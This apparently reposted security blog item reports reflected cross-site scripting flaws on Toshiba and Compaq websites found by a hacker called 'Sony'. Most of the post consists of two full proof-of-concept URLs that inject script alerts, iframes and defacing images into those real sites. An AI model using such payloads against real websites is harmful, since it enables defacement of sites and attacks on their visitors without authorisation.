Search This Blog

Toshiba & Compaq official site vulnerable to XSS (Cross site Scripting)

A Hacker "Sony" discovered XSS vulnerability in Toshiba and Compaq official website.  Yesterday , he discovered XSS vulnerability in Standford ,Oxford university websites.

POC for Compaq vulnerability:
https://neptest.nonstop.compaq.com/buildpage.asp?Page=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Without%20music,%20life%20would%20be%20a%20mistake..%20By%20Sony%22%29%3C/script%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Ciframe%20width=%22520%22%20height=%22415%22%20src=%22http://www.youtube.com/embed/BoAKPrzrKPI%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Cimg%20src=http://foxtrotters.tripod.com/ansnowmn2.gif%20align=center%3E


POC for Toshiba Vulnerability:
http://start.toshiba.com/games/free_online_games.php?cat=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%20%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%20by%20Sony%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:%20url%28http://www.lenagold.ru/fon/peo/part/body09.jpg%29;}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%22%20style=%22height:%20400px;%20width:%20500px;%22%3E

source:
st2tea.blogspot.com
Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability